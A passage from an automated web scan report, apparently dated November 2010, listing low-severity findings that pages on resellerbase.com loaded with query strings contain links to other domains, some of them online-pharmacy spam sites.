Content-Length: 17326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.rxassistent.com/">http://www.rxassistent.com/</a>
...[SNIP]...
<td><a href="http://www.reedy-web.com">http://www.reedy-web.com</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.333. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pflag=search&ltr=I HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 16150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.fioricet-rx.com/">http://www.fioricet-rx.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.334. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pflag=search&ltr=D HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.drugsforyourhealth.com/">http://www.drugsforyourhealth.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.335. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pflag=search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
</a><a href=http://www.euro-drugs.biz> Prescriptions online</a>
...[SNIP]...
<td><a href="http://www.easy-rx-meds.net">http://www.easy-rx-meds.net</a>
...[SNIP]...
<td><a href="http://www.rx-buy.info/">http://www.rx-buy.info/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.336. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pflag=search&ltr=M HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.pharmaceutical-sale.com/">http://www.pharmaceutical-sale.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.337. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pg_which=4&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:58:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 27983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.genericmedsale.com">http://www.genericmedsale.com</a>
...[SNIP]...
<td><a href="http://www.fioricet-rx.com/">http://www.fioricet-rx.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.338. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pg_which=6&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:58:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 27920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.pharmaceutical-sale.com/">http://www.pharmaceutical-sale.com/</a>
...[SNIP]...
<td><a href="http://www.tramadol-rx.com/">http://www.tramadol-rx.com/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.339. http://www.resellerbase.com/user_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /user_search.php?pflag=search&ltr=B HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<td><a href="http://www.rx-buy.info/">http://www.rx-buy.info/</a>
...[SNIP]...
<td><a href="http://www.trustedstore.info/">http://www.trustedstore.info/</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.340. http://www.resellerbase.com/web-service/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.341. http://www.resellerbase.com/web-service/domain-names/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.342. http://www.resellerbase.com/web-service/domain-names/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/googlepr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /web-service/domain-names/googlepr.php?link_id=4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.343. http://www.resellerbase.com/web-service/domain-names/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:46:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dograecorp.com" name="link_45"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dograecorp.com" name="link_45"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nicline.com" name="link_28"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nicline.com" name="link_28"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://reseller.targetdomain.com" name="link_4"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://reseller.targetdomain.com" name="link_4"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.resellerclub.com" name="link_17"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.resellerclub.com" name="link_17"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.344. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.345. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/domain-names/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.346. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.347. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.348. http://www.resellerbase.com/web-service/domain-names/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.349. http://www.resellerbase.com/web-service/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /web-service/googlepr.php?link_id=7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
